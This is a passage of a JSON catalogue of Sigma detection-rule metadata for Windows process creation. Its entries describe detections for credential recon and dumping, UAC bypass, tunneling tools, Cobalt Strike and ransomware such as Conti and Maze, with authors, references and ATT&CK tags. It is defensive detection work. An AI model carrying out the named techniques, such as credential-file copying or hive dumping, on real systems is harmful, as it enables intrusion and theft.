- "value": "Suspicious Load DLL via CertOC.exe"
- },
- {
- "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/01",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_certutil_ntlm_coercion.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/LOLBAS-Project/LOLBAS/issues/243",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218"
- ]
- },
- "uuid": "6c6d9280-e6d0-4b9d-80ac-254701b64916",
- "value": "NTLM Coercion Via Certutil.exe"
- },
- {
- "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.",
- "meta": {
- "author": "Timur Zinniatullin, oscd.community",
- "creation_date": "2019/10/21",
- "falsepositive": [
- "Admin activity"
- ],
- "filename": "proc_creation_win_change_default_file_association.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_association.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1546.001"
- ]
- },
- "uuid": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061",
- "value": "Change Default File Association"
- },
- {
- "description": "Detects when a program changes the default file association of any extension to an executable",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/06/28",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_change_default_file_assoc_susp.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1546.001"
- ]
- },
- "uuid": "ae6f14e6-14de-45b0-9f44-c0986f50dc89",
- "value": "Change Default File Association To Executable"
- },
- {
- "description": "Detects usage of the Chisel tunneling tool via the commandline arguments",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/09/13",
- "falsepositive": [
- "Some false positives may occure with other tools with similar commandlines"
- ],
- "filename": "proc_creation_win_chisel_usage.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/jpillora/chisel/",
- "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1090.001"
- ]
- },
- "uuid": "8b0e12da-d3c3-49db-bb4f-256703f380e5",
- "value": "Chisel Tunneling Tool Usage"
- },
- {
- "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'",
- "meta": {
- "author": "Aedan Russell, frack113 (sigma)",
- "creation_date": "2022/06/19",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_chrome_load_extension.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/chromeloader/",
- "https://emkc.org/s/RJjuLa",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1176"
- ]
- },
- "uuid": "27ba3207-dd30-4812-abbf-5d20c57d474e",
- "value": "Powershell ChromeLoader Browser Hijacker"
- },
- {
- "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.",
- "meta": {
- "author": "Nasreddine Bencherchali @nas_bench",
- "creation_date": "2021/12/18",
- "falsepositive": [
- "Legitimate administrative use (Should be investigated either way)"
- ],
- "filename": "proc_creation_win_cleanwipe.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cleanwipe.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ]
- },
- "uuid": "f44800ac-38ec-471f-936e-3fa7d9c53100",
- "value": "CleanWipe Usage"
- },
- {
- "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications.",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/07/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_clip.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip.yml"
- ],
- "tags": [
- "attack.collection",
- "attack.t1115"
- ]
- },
- "uuid": "ddeff553-5233-4ae9-bbab-d64d2bd634be",
- "value": "Use of CLIP"
- },
- {
- "description": "Detects usage of cmdkey to look for cached credentials",
- "meta": {
- "author": "jmallette, Florian Roth, Nasreddine Bencherchali (update)",
- "creation_date": "2019/01/16",
- "falsepositive": [
- "Legitimate administrative tasks"
- ],
- "filename": "proc_creation_win_cmdkey_recon.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation",
- "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.005"
- ]
- },
- "uuid": "07f8bdc2-c9b3-472a-9817-5a670b872f53",
- "value": "Cmdkey Cached Credentials Recon"
- },
- {
- "description": "Adversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/01/15",
- "falsepositive": [
- "Legitimate scripts"
- ],
- "filename": "proc_creation_win_cmd_delete.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_delete.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1070.004"
- ]
- },
- "uuid": "379fa130-190e-4c3f-b7bc-6c8e834485f3",
- "value": "Windows Cmd Delete File"
- },
- {
- "description": "Detects possible payload obfuscation via the commandline",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/02/15",
- "falsepositive": [
- "Legitimate use"
- ],
- "filename": "proc_creation_win_cmd_dosfuscation.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ]
- },
- "uuid": "a77c1610-fc73-4019-8e29-0f51efc04a51",
- "value": "Suspicious Dosfuscation Character in Commandline"
- },
- {
- "description": "Detect use of \"/R <\" to read and execute a file via cmd.exe",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/08/20",
- "falsepositive": [
- "Legitimate use"
- ],
- "filename": "proc_creation_win_cmd_read_contents.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_read_contents.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.003"
- ]
- },
- "uuid": "00a4bacd-6db4-46d5-9258-a7d5ebff4003",
- "value": "Read and Execute a File Via Cmd.exe"
- },
- {
- "description": "Use \">\" to redicrect information in commandline",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/01/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_cmd_redirect.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://ss64.com/nt/syntax-redirection.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirect.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1082"
- ]
- },
- "uuid": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a",
- "value": "Redirect Output in CommandLine"
- },
- {
- "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/07/12",
- "falsepositive": [
- "Legitimate admin scripts"
- ],
- "filename": "proc_creation_win_cmd_redirection_susp_folder.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1218"
- ]
- },
- "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892",
- "value": "Suspicious CMD Shell Redirect"
- },
- {
- "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)",
- "meta": {
- "author": "Nik Seetharaman, Christian Burkard",
- "creation_date": "2019/07/31",
- "falsepositive": [
- "Legitimate CMSTP use (unlikely in modern enterprise environments)"
- ],
- "filename": "proc_creation_win_cmstp_com_object_access.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/",
- "https://twitter.com/hFireF0X/status/897640081053364225",
- "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
- "https://github.com/hfiref0x/UACME",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1548.002",
- "attack.t1218.003",
- "attack.g0069",
- "car.2019-04-001"
- ]
- },
- "uuid": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253",
- "value": "CMSTP UAC Bypass via COM Object Access"
- },
- {
- "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution",
- "meta": {
- "author": "Nik Seetharaman",
- "creation_date": "2018/07/16",
- "falsepositive": [
- "Legitimate CMSTP use (unlikely in modern enterprise environments)"
- ],
- "filename": "proc_creation_win_cmstp_execution_by_creation.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.execution",
- "attack.t1218.003",
- "attack.g0069",
- "car.2019-04-001"
- ]
- },
- "uuid": "7d4cdc5a-0076-40ca-aac8-f7e714570e47",
- "value": "CMSTP Execution Process Creation"
- },
- {
- "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell",
- "meta": {
- "author": "_pete_0, TheDFIRReport",
- "creation_date": "2022/05/06",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_cobaltstrike_bloopers_cmd.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf",
- "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
- "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.003"
- ]
- },
- "uuid": "647c7b9e-d784-4fda-b9a0-45c565a7b729",
- "value": "Operator Bloopers Cobalt Strike Commands"
- },
- {
- "description": "Detects use of Cobalt Strike module commands accidentally entered in the CMD shell",
- "meta": {
- "author": "_pete_0, TheDFIRReport",
- "creation_date": "2022/05/06",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_cobaltstrike_bloopers_modules.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf",
- "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
- "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.003"
- ]
- },
- "uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48",
- "value": "Operator Bloopers Cobalt Strike Modules"
- },
- {
- "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.",
- "meta": {
- "author": "Wojciech Lesicki",
- "creation_date": "2021/06/01",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_cobaltstrike_load_by_rundll32.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.cobaltstrike.com/help-windows-executable",
- "https://redcanary.com/threat-detection-report/",
- "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "uuid": "ae9c6a7c-9521-42a6-915e-5aaa8689d529",
- "value": "CobaltStrike Load by Rundll32"
- },
- {
- "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/07/27",
- "falsepositive": [
- "Other programs that cause these patterns (please report)"
- ],
- "filename": "proc_creation_win_cobaltstrike_process_patterns.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/",
- "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ]
- },
- "uuid": "f35c5d71-b489-4e22-a115-f003df287317",
- "value": "CobaltStrike Process Patterns"
- },
- {
- "description": "detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking",
- "meta": {
- "author": "xknow @xknow_infosec, Tim Shelton",
- "creation_date": "2020/06/11",
- "falsepositive": [
- "(not much) some benign Java tools may product false-positive commandlines for loading libraries"
- ],
- "filename": "proc_creation_win_commandline_path_traversal.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/",
- "https://twitter.com/Oddvarmoe/status/1270633613449723905",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.003"
- ]
- },
- "uuid": "087790e3-3287-436c-bccf-cbd0184a7db1",
- "value": "Cmd.exe CommandLine Path Traversal"
- },
- {
- "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal",
- "meta": {
- "author": "Christian Burkard",
- "creation_date": "2021/10/26",
- "falsepositive": [
- "Google Drive",
- "Citrix"
- ],
- "filename": "proc_creation_win_commandline_path_traversal_evasion.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/hexacorn/status/1448037865435320323",
- "https://twitter.com/Gal_B1t/status/1062971006078345217",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036"
- ]
- },
- "uuid": "1327381e-6ab0-4f38-b583-4c1b8346a56b",
- "value": "Command Line Path Traversal Evasion"
- },
- {
- "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/11/10",
- "falsepositive": [
- "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"
- ],
- "filename": "proc_creation_win_computer_discovery_get_adcomputer.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
- "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1033"
- ]
- },
- "uuid": "435e10e4-992a-4281-96f3-38b11106adde",
- "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet"
- },
- {
- "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/06/14",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_conhost_path_traversal.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://pentestlab.blog/2020/07/06/indirect-command-execution/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.003"
- ]
- },
- "uuid": "ee5e119b-1f75-4b34-add8-3be976961e39",
- "value": "Conhost.exe CommandLine Path Traversal"
- },
- {
- "description": "Conti ransomware command line ioc",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/10/12",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_conti_cmd_ransomware.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
- "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_cmd_ransomware.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.s0575",
- "attack.t1486"
- ]
- },
- "uuid": "689308fc-cfba-4f72-9897-796c1dc61487",
- "value": "Conti Ransomware Execution"
- },
- {
- "description": "Detects a command used by conti to dump database",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/08/16",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_conti_sqlcmd.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
- "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
- "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml"
- ],
- "tags": [
- "attack.collection",
- "attack.t1005"
- ]
- },
- "uuid": "2f47f1fd-0901-466e-a770-3b7092834a1b",
- "value": "Conti Backup Database"
- },
- {
- "description": "Detects the malicious use of a control panel item",
- "meta": {
- "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)",
- "creation_date": "2020/06/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_control_panel_item.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://attack.mitre.org/techniques/T1196/",
- "https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.defense_evasion",
- "attack.t1218.002",
- "attack.persistence",
- "attack.t1546"
- ]
- },
- "uuid": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4",
- "value": "Control Panel Items"
- },
- {
- "description": "Files with well-known filenames (sensitive files with credential data) copying",
- "meta": {
- "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community",
- "creation_date": "2019/10/22",
- "falsepositive": [
- "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator"
- ],
- "filename": "proc_creation_win_copying_sensitive_files_with_credential_data.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/",
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.002",
- "attack.t1003.003",
- "car.2013-07-001",
- "attack.s0404"
- ]
- },
- "uuid": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f",
- "value": "Copying Sensitive Files with Credential Data"
- },
- {
- "description": "Detects usage of the copy command to copy files with the .dmp extensions from a remote share",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_copy_dmp_from_share.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml"
- ],
- "tags": [
- "attack.credential_access"
- ]
- },
- "uuid": "044ba588-dff4-4918-9808-3f95e8160606",
- "value": "Copy DMP Files From Share"
- },
- {
- "description": "Detects suspicious process patterns found in logs when CrackMapExec is used",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/03/12",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_crackmapexec_patterns.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001"
- ]
- },
- "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6",
- "value": "CrackMapExec Process Patterns"
- },
- {
- "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud",
- "meta": {
- "author": "Max Altgelt",
- "creation_date": "2022/04/06",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_creative_cloud_node_abuse.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/mttaggart/status/1511804863293784064",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1127",
- "attack.t1059.007"
- ]
- },
- "uuid": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e",
- "value": "Node Process Executions"
- },
- {
- "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS",
- "meta": {
- "author": "Sreeman",
- "creation_date": "2020/10/29",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_credential_access_via_password_filter.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/",
- "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_access_via_password_filter.yml"
- ],
- 
"tags": [ - "attack.credential_access", - "attack.t1556.002" - ] - }, - "uuid": "b7966f4a-b333-455b-8370-8ca53c229762", - "value": "Dropping Of Password Filter DLL" - }, - { - "description": "Detects Credential Acquisition via Registry Hive Dumping", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/10/04", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_credential_acquisition_registry_hive_dumping.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_acquisition_registry_hive_dumping.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ] - }, - "uuid": "4d6c9da1-318b-4edf-bcea-b6c93fa98fd0", - "value": "Credential Acquisition via Registry Hive Dumping" - }, - { - "description": "Detects Archer malware invocation via rundll32", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/06/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_crime_fireball.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/", - "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_fireball.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", - "value": "Fireball Archer Install" - }, - { - "description": "Detects specific process characteristics of Maze ransomware word document 
droppers", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/05/08", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_crime_maze_ransomware.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/", - "https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", - "value": "Maze Ransomware" - }, - { - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/08/26", - "falsepositive": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" - ], - "filename": "proc_creation_win_crime_snatch_ransomware.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ] - }, - "uuid": "5325945e-f1f0-406e-97b8-65104d393fff", - "value": "Snatch Ransomware" - }, - { - "description": "Detects command line parameters or strings often used by crypto miners", - "meta": { - "author": "Florian Roth", 